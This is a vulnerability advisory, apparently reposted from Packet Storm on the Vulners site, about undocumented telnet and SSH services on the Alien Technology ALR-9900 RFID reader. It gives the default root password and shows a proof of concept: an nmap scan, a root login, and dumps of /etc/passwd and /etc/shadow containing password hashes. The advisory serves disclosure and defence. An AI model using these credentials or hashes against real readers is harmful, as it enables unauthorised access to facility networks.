Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Alien Technology ALR-9900 Default Passwords

🗓️ 06 May 2010 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 54 Views

Alien Technology ALR-9900 Default Passwords and Undocumented Service

Code
`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Tested:  
www.alientechnology.com/readers/alr9900.php  
  
Background:  
Alien Technology is a major rfid-reader designer and manufacturer.  
Alien's products are sold to many corporations and the military.  
Alien's readers can be interfaced with in several ways including:  
serial, IO Port and Ethernet port. Alien has several daemons  
running on their reader that accessible through Ethernet and  
completely undocumented. We called Alien several times to ask them  
about these undocumented services and were first deferred to  
technical support and then had our numbers blocked. We then  
emailed them about the security ramifications of these daemons and  
received no reply.  
  
The Undocumented:  
port 2323 - telnetd  
port 23 - telnetd  
port 22 - sshd  
  
The Flaws:  
default root password = 'alien'  
alien account has same password across all readers  
port 2323 - provides a backdoor onto the readers for anyone who  
knows the alien (or root) account password  
port 23 - ""  
port 22 - ""  
  
The P.O.C:  
Starting Nmap 5.21 ( http://nmap.org ) at 20XX-XX-XX XX:XX Pacific  
Daylight Time  
  
Nmap scan report for XXX.XXX.XXX.XXX  
Host is up (0.000092s latency).  
Not shown: 995 closed ports  
  
PORT STATE SERVICE  
22/tcp open ssh  
23/tcp open telnet  
80/tcp open http  
111/tcp open rpcbind  
2323/tcp open unknown  
  
MAC Address: XX:XX:XX:XX:XX:XX (Alien Technology)  
Nmap done: 1 IP address (1 host up) scanned in 0.66 seconds  
  
  
login as: root  
Using keyboard-interactive authentication.  
Password: <- root  
Access denied  
Using keyboard-interactive authentication.  
Password: <- password  
Access denied  
Using keyboard-interactive authentication.  
Password: <- alien  
  
Last login: Sun Jan 11 03:04:54 1970 from XXX.XXX.XXX.XXX  
root@alien-XXXXXX alien# id  
uid=0(root) gid=0(root) groups=0(root)  
  
root@alien-XXXXXX alien# cat /etc/passwd  
root:$1$lKC6KEQ/$TY22pTtIBwjLxWd2EvM.d0:0:0:root:/root:/bin/bash  
daemon:*:1:1:daemon:/usr/sbin:/bin/sh  
bin:*:2:2:bin:/bin:/bin/sh  
sys:*:3:3:sys:/dev:/bin/sh  
sync:*:4:65534:sync:/bin:/bin/sync  
man:*:6:12:man:/var/cache/man:/bin/sh  
lp:*:7:7:lp:/var/spool/lpd:/bin/sh  
mail:*:8:8:mail:/var/mail:/bin/sh  
news:*:9:9:news:/var/spool/news:/bin/sh  
uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh  
proxy:*:13:13:proxy:/bin:/bin/sh  
www-data:*:33:33:www-data:/var/www:/bin/sh  
backup:*:34:34:backup:/var/backups:/bin/sh  
list:*:38:38:Mailing List Manager:/var/list:/bin/sh  
irc:*:39:39:ircd:/var/run/ircd:/bin/sh  
gnats:*:41:41:Gnats Bug-Reporting System  
(admin):/var/lib/gnats:/bin/sh  
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh  
sshd:x:100:65534::/var/run/sshd:/bin/false  
ntpd:x:102:102::/var/run/openntpd:/bin/false  
alien:$1$kcyCMoEZ$kiwa.OVk5PuG4pBwbYEP//:1000:1000:The  
Alien,18220,,:/home/alien:/bin/bash  
  
root@alien-XXXXXX alien# cat /etc/shadow  
ntpd:!:13602:0:99999:7:::  
sshd:!:13602:0:99999:7:::  
alien:$1$kcyCMoEZ$kiwa.OVk5PuG4pBwbYEP//:13602:0:99999:7:::  
  
Impact:  
Alien's readers are deployed in many secure facilities with  
typically closed networks. Although these networks are closed,  
these undocumented services could allow employees to modify reader  
settings and subvert checkout systems. These checkout systems are  
often used to track valuable items making such vulnerabilities a  
serious matter. If these readers are deployed on an open or large  
network they provide an easy way to tunnel into the network or  
attack it from an unexpected location. Lastly, if someone cracks  
the alien account's password hash they get to use Alien's backdoor.  
  
-----BEGIN PGP SIGNATURE-----  
Charset: UTF8  
Version: Hush 3.0  
Note: This signature can be verified at https://www.hushtools.com/verify  
  
wpwEAQMCAAYFAkvgptYACgkQPn8o33YUciG/QQQAkB6HDocLM3zd90K5lSN00sGZyaUc  
0e5sraILohD4kk2rkSi/dfvZsrPq30nkMrGqrrgqH5sJTtQ6T24UWvfYUH32H8fGGPzN  
Ay8w6R+x61IU/4TZYSCq6xZbdI9yhjfOiTi0vwV3xjuwdKul8Zc6c0e0ih8pULG4dAM8  
ZXExxzM=  
=Bb1k  
-----END PGP SIGNATURE-----  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 May 2010 00:00Current
0.7Low risk
Vulners AI Score0.7
alien technologyrfid readerdefault passwordundocumented servicessecurity ramificationsbackdoornetwork vulnerabilitiessecure facilities
54